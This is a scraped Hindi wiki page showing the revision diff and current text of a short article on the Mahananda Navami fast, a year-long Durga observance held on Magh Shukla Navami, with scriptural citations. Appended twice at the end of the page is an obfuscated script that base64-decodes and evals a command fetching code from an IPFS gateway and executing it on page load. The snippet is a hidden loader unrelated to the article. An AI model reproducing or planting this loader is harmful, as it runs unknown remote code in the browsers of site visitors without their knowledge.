Difference between revisions of "महानन्दा नवमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*माघ शुक्ल की नवमी को महानन्दा कहा जाता है।  
 
*माघ शुक्ल की नवमी को महानन्दा कहा जाता है।  
 
*यह व्रत एक वर्ष तक होता है।  
 
*यह व्रत एक वर्ष तक होता है।  
Line 6: Line 6:
 
*प्रत्येक अवधि में धूप, नैवेद्य एवं देवी नाम विभिन्न हैं।  
 
*प्रत्येक अवधि में धूप, नैवेद्य एवं देवी नाम विभिन्न हैं।  
 
*इस व्रत से कर्ता की सभी कामनाएँ पूर्ण होती हैं।
 
*इस व्रत से कर्ता की सभी कामनाएँ पूर्ण होती हैं।
*कर्ता को [[ब्रह्मलोक]] की प्राप्ति होती है।<ref>कृत्यकल्पतरु (व्रत॰ 306-307); हेमाद्रि (व्रत॰ 1, 955-956, भविष्यपुराण से उद्धरण)</ref>  
+
*कर्ता को [[ब्रह्मलोक]] की प्राप्ति होती है।<ref>कृत्यकल्पतरु (व्रत॰ 306-307); हेमाद्रि (व्रत॰ 1, 955-956, भविष्यपुराण से उद्धरण</ref>  
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:55, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • magh shukl ki navami ko mahananda kaha jata hai.
  • yah vrat ek varsh tak hota hai.
  • is vrat mean devi durga ki pooja ki jati hai.
  • char masoan ki avadhi mean varsh ko 3 bhagoan mean baanta jata hai.
  • pratyek avadhi mean dhoop, naivedy evan devi nam vibhinn haian.
  • is vrat se karta ki sabhi kamanaean poorn hoti haian.
  • karta ko brahmalok ki prapti hoti hai.[1]


tika tippani aur sandarbh

  1. krityakalpataru (vrat॰ 306-307); hemadri (vrat॰ 1, 955-956, bhavishyapuran se uddharan

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>